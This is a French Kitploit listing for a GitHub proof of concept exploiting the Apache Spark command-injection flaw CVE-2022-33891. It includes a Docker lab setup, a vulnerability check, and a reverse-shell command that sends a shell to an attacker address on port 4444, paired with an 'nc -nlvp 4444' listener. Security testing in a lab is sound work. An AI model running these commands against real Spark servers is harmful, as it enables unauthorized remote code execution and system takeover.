Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-33891 — Preuve de concept d'exploitation pour l'injection de commandes Apache Spark (CVE-2022-33891) avec modes de vérification et de shell inversé, permettant des tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/asepsaepdin/cve-2022-33891
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

Preuve de concept d'exploitation pour l'injection de commandes Apache Spark (CVE-2022-33891) avec modes de vérification et de shell inversé, permettant des tests de sécurité autorisés.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-33891 - Vulnérabilité d'injection de commande Apache Spark

Python


⚠️ À des fins éducatives et de recherche en sécurité autorisée uniquement

Auteurs de l'exploit original

Très reconnaissant à l'auteur original du PoC AkbarTrilaksana

Description

L'interface utilisateur Apache Spark offre la possibilité d'activer les ACL via l'option de configuration spark.acls.enable. Avec un filtre d'authentification, cela vérifie si un utilisateur a les autorisations d'accès pour voir ou modifier l'application. Si les ACL sont activées, un chemin de code dans HttpSecurityFilter peut permettre à quelqu'un d'usurper une identité en fournissant un nom d'utilisateur arbitraire. Un utilisateur malveillant pourrait alors atteindre une fonction de vérification des permissions qui construira finalement une commande shell Unix basée sur son entrée, et l'exécuter. Cela entraînera une exécution arbitraire de commandes shell sous l'utilisateur sous lequel Spark s'exécute actuellement. Cela affecte les versions d'Apache Spark 3.0.3 et antérieures, les versions 3.1.1 à 3.1.2, et les versions 3.2.0 à 3.2.1.


Guide des étapes

  1. Tout d'abord, clonez le dépôt

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  2. Changez de répertoire

    root@kitploit:~
    cd CVE-2022-33891
    
  3. Installez les dépendances :

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  4. Laissez le conteneur démarrer

    root@kitploit:~
    docker compose up
    
  5. Dans un nouveau terminal, exécutez la commande

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  6. Dans la session bash du conteneur, entrez :

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  7. Optionnellement, utilisez cat pour afficher le contenu de spark-defaults.conf afin de vérifier qu'il est correct.

  8. Quittez le shell bash interactif et faites Ctl-C sur votre processus docker-compose.

  9. Une fois que les conteneurs se sont arrêtés correctement, relancez docker-compose up

    root@kitploit:~
    docker compose up
    
  10. Vérifiez si la cible est vulnérable :

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  11. Du point de vue d'un attaquant, l'exécution de code à distance est essentielle pour obtenir un accès à un shell interactif. Ainsi, l'exécution de la commande suivante déclencherait un reverse shell telnet sur tcp basé sur bash vers le système de l'attaquant sur le port 4444/tcp :

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

Crédits

  • https://github.com/AkbarTrilaksana/cve-2022-33891
  • https://nvd.nist.gov/vuln/detail/cve-2022-33891
Télécharger l’outil